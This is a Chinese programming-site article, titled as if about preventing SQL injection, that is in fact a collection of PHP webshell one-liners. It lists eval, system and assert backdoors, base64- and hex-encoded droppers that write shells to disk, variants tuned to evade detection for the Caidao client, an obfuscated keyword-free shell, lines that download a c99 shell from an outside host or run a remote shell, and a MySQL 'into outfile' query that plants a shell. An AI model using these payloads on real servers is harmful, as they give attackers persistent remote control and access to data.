php提供哪些函数来避免sql的注入(PHP与SQL语句写一句话木马总结)
类别:编程学习 浏览量:1073
时间:2021-10-05 00:39:58 php提供哪些函数来避免sql的注入
PHP与SQL语句写一句话木马总结一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
|
<?php @ eval ( $_GET [ "code" ])?> <?php @system( $_POST [ "cmd" ])?> |
二、编码的替换的类型:
|
<?php @ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));?> //会生成<?php @eval($_POST['lostwolf']);?> <script language= "php" >@ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));</script> //php在html内部的一种嵌入方式 <?php fputs ( fopen (pack( "H*" , "6c6f7374776f6c662e706870" ), "w" ),pack( "H*" , "3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e" ))?> <?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' );?> |
三、其他类型:
|
<?php $_GET [a]( $_GET [b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert( $_REQUEST [ "pass" ]);?> //菜刀连接 躲避检测 密码pass <?php substr (md5( $_REQUEST [ 'x' ]),28)== 'acd0' && eval ( $_REQUEST [ 'pass' ]);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass |
四、下载类型:
|
<?php echo copy ( "http://www.r57.me/c99.txt" , "lostwolf.php" ); ?> <? echo file_get_contents ( "..//cfg_database.php" );?> //显示某文件 <? eval ( file_get_contents ( "远程shell" )) ?> //运行远程shell |
五、无关键函数类型:
|
<?php $_ = "" ; $_ [+ "" ]= '' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" ); ?> <?php ${ '_' . $_ }[ '_' ](${ '_' . $_ }[ '__' ]);?> http: //site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass <? $_ = "" ; $_ [+ "" ]= '_' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" );?> |
六、补充知识点:
SQL写一句话(MySQL):
|
select "<?php @system($_POST[" pass "]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以 |
以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对开心学习网的支持。
您可能感兴趣
- php中trim函数(PHP中ltrim函数的用法与实例讲解)
- php启用curl(php使用curl伪造浏览器访问操作示例)
- thinkphp5.1修改(ThinkPHP 5.1 跨域配置方法)
- php array只能放一种类型的数据(浅谈PHP array_search 和 in_array 函数效率问题)
- php 精度误差调整(php精度计算的问题解析)
- php运行模式图解(php策略模式简单示例分析区别于工厂模式)
- phpstudy不解析php代码(phpstudy伪静态设置的问题)
- php框架制作方法(PHP从零开始打造自己的MVC框架之路由类实现方法分析)
- php获取数组中和为指定数的数组(php统计数组不同元素的个数的实例方法)
- php查找文件存在(php判断目录存在的简单方法)
- 织梦cms漏洞怎么解决(织梦cms、帝国cms、PHPcms优缺点解析)
- apache搭建php环境(Windows上安装Apache2、PHP5、MySQL5及与Resin配合实现多系统之整合)
- php的流程控制语句(PHP基于swoole多进程操作示例)
- php执行语句(PHP goto语句用法实例)
- thinkphp5.1手动连接mysql数据库(thinkphp5框架结合mysql实现微信登录和自定义分享链接与图文功能示例)
- php自定义函数返回多少个值(PHP7导出Excel报ERR_EMPTY_RESPONSE解决方法)
- 素人恋爱综艺火药味十足 男生为赢得芳心集体扯头花,真是出好戏(素人恋爱综艺火药味十足)
- 《囧妈》为何受抵制 春节七部影片撤档背后的责任与博弈(囧妈为何受抵制)
- 提醒 2019年起河南驾考要开设科目五 官方回应来了(2019年起河南驾考要开设科目五)
- 省 市书法家协会 送万福进万家 活动走进禹州美丽乡村(省市书法家协会)
- 点赞 禹州苌庄正式撤乡建镇 未来发展不可估量(禹州苌庄正式撤乡建镇)
- 它荣获 中国生态魅力镇 称号 就在咱们禹州,一起来看看(中国生态魅力镇)
热门推荐
- css42个实用技巧(你必须要知道的几个CSS技巧)
- python用于机器人(python机器人运动范围问题的解答)
- docker 构建整个环境(Docker如何快速搭建LNMP环境最新)
- python爬虫入门代码(python爬虫基础教程:requests库二代码实例)
- mysql安装失败原因和解决方法(MySQL MGR搭建过程中常遇见的问题及解决办法)
- vue3和vue2(Vue3对比Vue2的优点总结)
- vue3 composition api用法(vue3中provide和inject的使用)
- tomcat部署web项目常见问题(关于tomcat部署应用无法访问前端页面的问题)
- css文字图片垂直居中对齐(CSS设置文字图片垂直居中的方法总结)
- python远程下发shell指令(Python实现堡垒机模式下远程命令执行操作示例)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9